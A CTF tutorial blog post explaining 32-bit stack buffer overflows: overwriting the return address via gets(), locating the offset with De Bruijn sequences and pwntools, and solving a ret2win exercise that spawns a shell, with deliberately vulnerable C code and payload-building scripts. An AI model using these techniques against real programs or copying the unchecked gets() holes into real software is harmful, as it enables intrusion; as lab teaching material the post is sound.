How do I even pwn anything? Part 2: Overwriting The Return Pointer

Daryl 🥖
5 min read · Apr 13, 2024


Explore how to perform Linux Binary Exploitation from Capture-the-Flag (CTF) competitions.

Click here for part 1!

Course Link

You can find all the files required for the exercises on GitHub.

Our First Stack Overflow

Let’s recall the sample C code again. It is a main function that allocates a 16-byte buffer on the stack, reads user input into it and returns. What could possibly go wrong?

#include <stdio.h>

int main() {
    char buffer[16];  // 16 bytes reserved on the stack
    gets(buffer);     // no length check: this is the bug

    return 0;
}

Well, it turns out that everything could go wrong here! The gets() function does not limit how much data it writes into the buffer. If the input is longer than the space allocated, it overwrites the saved EBP of the previous stack frame and, more importantly, the return pointer!

Let’s take a look at the stack again, but this time we write 24 bytes instead of 16. I will include the values of the ESP, EBP and EIP registers too.

Let’s begin by initialising the stack frame and allocating 16 bytes of memory.

Creating stack frame and allocating memory

Now let’s feed 24 A characters into the stack and observe what happens. Pay attention to the memory addresses, especially EIP.

Overflowing the buffer

We did it! We managed to redirect the program flow! EIP now points to 0x41414141, which is simply four of our A characters (0x41 is the ASCII code for A). How can this be useful?
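To make the overflow concrete, here is a minimal Python sketch that models the stack frame from the diagrams as a flat byte array. The layout (16-byte buffer, then 4 bytes of saved EBP, then the 4-byte return address) follows this example. The function name and the two initial register values are made up for illustration.

```python
import struct

BUFFER_SIZE = 16  # char buffer[16] from the sample code


def simulate_gets(user_input):
    """Copy user_input into a toy stack frame without any bounds check.

    Returns the (saved EBP, return address) values found in the frame afterwards.
    The trailing NUL byte that the real gets() appends is ignored here.
    """
    # Toy frame: [ buffer (16) | saved EBP (4) | return address (4) ]
    frame = bytearray(BUFFER_SIZE)
    frame += struct.pack("<I", 0xFFFFD0C8)  # hypothetical saved EBP
    frame += struct.pack("<I", 0x080484A0)  # hypothetical return address
    # Like gets(), keep writing even when the input is longer than the buffer
    frame[: len(user_input)] = user_input
    return struct.unpack_from("<II", frame, BUFFER_SIZE)


for size in (16, 20, 24):
    saved_ebp, return_address = simulate_gets(b"A" * size)
    print(size, hex(saved_ebp), hex(return_address))
```

With 16 bytes nothing outside the buffer changes, 20 bytes replace the saved EBP, and 24 bytes turn the return address into 0x41414141.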

What if we replaced 0x41414141 with an address of another function? What if there is an interesting function at address 0x8048412? How could we overwrite the return address with that?

Unlike AAAA, the bytes of an address are mostly non-printable characters, so they are a bit harder to type out. However, we can get around this by using the echo command!

echo -en "AAAA" | hexdump
echo -en "\x12\x84\x04\x08" | hexdump

A few questions to ponder. What is the -en for? Why is the address backwards? How do we pass these bytes into the vulnerable program?

Printing non-human readable characters
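A hint for the second question: x86 is little-endian, so the least significant byte of the address is stored first in memory. As a small sketch, Python's standard struct module can do the same conversion that the echo command above does by hand. The helper name pack_address is my own.

```python
import struct


def pack_address(address):
    """Encode a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", address)


packed = pack_address(0x8048412)
print(packed.hex())  # 12840408
```

The "<" in the format string asks for little-endian order and "I" for an unsigned 32-bit integer, which matches the \x12\x84\x04\x08 bytes passed to echo.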

Awesome! Now all we have to do is to retrieve the addresses of the interesting functions. We can get the addresses of these symbols (functions and global variables) by using the readelf -s command.

readelf -s binaryfile
Finding the address of the win function in a binary file

Excellent! We now know that the address of the win function is 0x8048412.
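If you would rather not read the symbol table by eye, the lookup can be scripted. The sketch below parses the text that readelf -s prints, assuming the usual column order (Num, Value, Size, Type, Bind, Vis, Ndx, Name). The sample row is made up for illustration; only the win address comes from this article.

```python
def find_symbol(readelf_output, name):
    """Return the address of `name` from `readelf -s` text, or None if absent."""
    for line in readelf_output.splitlines():
        fields = line.split()
        # Symbol rows look like: "64: 08048412 43 FUNC GLOBAL DEFAULT 14 win"
        if len(fields) < 8 or not fields[0].rstrip(":").isdigit():
            continue
        symbol = fields[7].split("@")[0]  # drop a version suffix such as @GLIBC_2.0
        if symbol == name:
            return int(fields[1], 16)
    return None


# Hypothetical sample output, not taken from a real binary.
SAMPLE = """\
   Num:    Value  Size Type    Bind   Vis      Ndx Name
    64: 08048412    43 FUNC    GLOBAL DEFAULT   14 win
"""

print(hex(find_symbol(SAMPLE, "win")))  # 0x8048412
```

On a real binary, the input text could come from subprocess.run(["readelf", "-s", path], capture_output=True, text=True).stdout.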

Finding The Padding

One last thing! In this scenario, you know that 20 bytes of padding are required before any further input overwrites the return address. However, finding this padding manually is annoying. What if you needed 64 bytes? 256 bytes? Maybe even 10 kilobytes? Counting through a buffer that large gets tedious really quickly.

Sure, you can always make educated guesses and perform trial and error, but what if there’s a better way?

Introducing the De Bruijn sequence, which according to Wikipedia is “a cyclic sequence in which every possible length-n string on A occurs exactly once as a substring”, where A is the alphabet the sequence is built from.

De Bruijn sequence visualised

Notice how no green-highlighted portion ever repeats? We can generate a huge sequence, pass it to the buffer and observe the value of the return address after it has been overwritten. Since that value appears only once in the sequence, a program can look up its position, and that position is the padding we need!

You can generate such a sequence using pwntools.

from pwn import *

print(cyclic(50))               # Generate a 50-byte sequence
print(cyclic_find(0x61616174))  # Find the offset of the value that landed in EIP
Side by side comparison of manual vs De Bruijn sequence
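If you are curious what happens under the hood, here is a rough pure-Python sketch of the idea. It uses the standard recursive construction of a De Bruijn sequence, and it assumes a lowercase alphabet with 4-byte subsequences, which is what the pattern in this article suggests. It is an illustration, not the pwntools implementation.

```python
import string
import struct


def de_bruijn(alphabet, n):
    """Return the De Bruijn sequence of order n over alphabet as a string."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1 : p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)


# Only the first 100 characters are needed for a small buffer
pattern = de_bruijn(string.ascii_lowercase, 4)[:100]

# The value seen in EIP, converted back to the bytes as they sat in memory
needle = struct.pack("<I", 0x61616174).decode()  # "taaa"
print(pattern.find(needle))  # 76
```

Because every 4-character window is unique, find() can only match in one place, and that index is the number of padding bytes.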

Oh yeah, one final thing, I promise: you can pipe your data to netcat by using the | symbol.

echo "somedata" | nc example.com 420
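The same thing can be done from a script. Below is a minimal sketch using Python's standard socket module; the function name send_bytes is my own, and the host and port in the usage comment are the placeholder values from the command above.

```python
import socket


def send_bytes(host, port, data, timeout=5.0):
    """Connect to host:port, send data, and return everything the server replies."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)  # signal that we are done sending
        chunks = []
        while True:
            chunk = conn.recv(4096)
            if not chunk:  # the server closed the connection
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Usage (placeholder host and port):
# reply = send_bytes("example.com", 420, b"somedata\n")
```

Note that echo adds a trailing newline by default, which is why the usage comment sends b"somedata\n".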

Exercise

Return To Win — Hijacking the return pointer to control code execution

You can find the binary and source code at ret2win32. If you deployed the services locally, this exercise can be accessed using nc localhost 30000.

#include <stdio.h>
#include <stdlib.h>

void win() {
    system("/bin/sh");
}

void vuln() {
    char buffer[64];
    gets(buffer);
}

int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);

    puts("Guess my name");
    vuln();
    puts("Wrong!");

    return 0;
}

Try it on your own first and see if you can spot the vulnerability and get the flag!

Solution

If you didn’t manage to pwn it, do not worry, look at the solution and see if you can replicate it for yourself.

Let’s use Pwndbg’s cyclic command to generate the De Bruijn sequence. Run cyclic 100 and feed the output into the program. We notice that there is a segmentation fault at 0x61616174. This occurs because we have successfully overwritten the return address with our input, and the program then tried to jump to it.

Let’s use cyclic -l 0x61616174 to find the offset. In this case, we see that we need 76 bytes before overwriting the return address.

Finding the padding offset required

Great! All we have left to do is to feed in the address of the win() function and we will be able to get the flag. Using x win in Pwndbg, we can find the address of the win function.

Address of the win function

Ok, let’s put everything together! Let’s begin with 76 A characters (in pink), followed by the address of the win function in little endian format (in yellow) and pipe it to the ret2win32 binary.

Overwriting the return address
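For reference, the payload can also be assembled in a few lines of Python. This is only a sketch: build_payload is my own helper name, and the address in the usage part is an obvious placeholder that you would replace with the address of win that Pwndbg reports for your binary.

```python
import struct
import sys


def build_payload(offset, target_address):
    """Padding up to the return address, then the new return address."""
    padding = b"A" * offset
    new_return = struct.pack("<I", target_address)  # 32-bit little-endian
    return padding + new_return + b"\n"  # newline so gets() stops reading


if __name__ == "__main__":
    WIN_ADDRESS = 0xDEADBEEF  # placeholder, not the real address of win()
    # Write raw bytes; print() would mangle the non-printable ones
    sys.stdout.buffer.write(build_payload(76, WIN_ADDRESS))
```

The output of such a script can be piped into the binary in the same way as the output of echo.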

Wait what? Where’s the shell?

That’s because the output of echo is sent to the input of the binary, and once echo is done, the pipe is closed. This means that we actually got our shell; it just closed before we could input anything!

We can solve this by using cat to keep the pipe open. Run without arguments, cat copies its STDIN (our keyboard) to its STDOUT, and that STDOUT is piped into the STDIN of the binary, and therefore of the shell it spawns.

Piping STDOUT into STDIN
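You can see the same behaviour without any exploit. The sketch below uses /bin/sh as a stand-in for the shell that win() spawns (an assumption for illustration; it does not touch ret2win32) and shows what a shell does when its input pipe is closed right away versus when commands are waiting in it.

```python
import subprocess


def feed_shell(stdin_data):
    """Start /bin/sh, write stdin_data to its stdin, close the pipe, return its output."""
    result = subprocess.run(
        ["/bin/sh"],
        input=stdin_data,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
    )
    return result.stdout


print(feed_shell(b""))           # b'' : the pipe closes at once and the shell exits
print(feed_shell(b"echo hi\n"))  # b'hi\n' : the shell runs what it finds on STDIN
```

The first call mirrors what happened with echo alone: the shell started, read end-of-file and quit. Keeping the pipe open with cat gives us the chance to type commands before that end-of-file arrives.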

Now we can interact with the shell! Solution script here.

Click here for part 3!
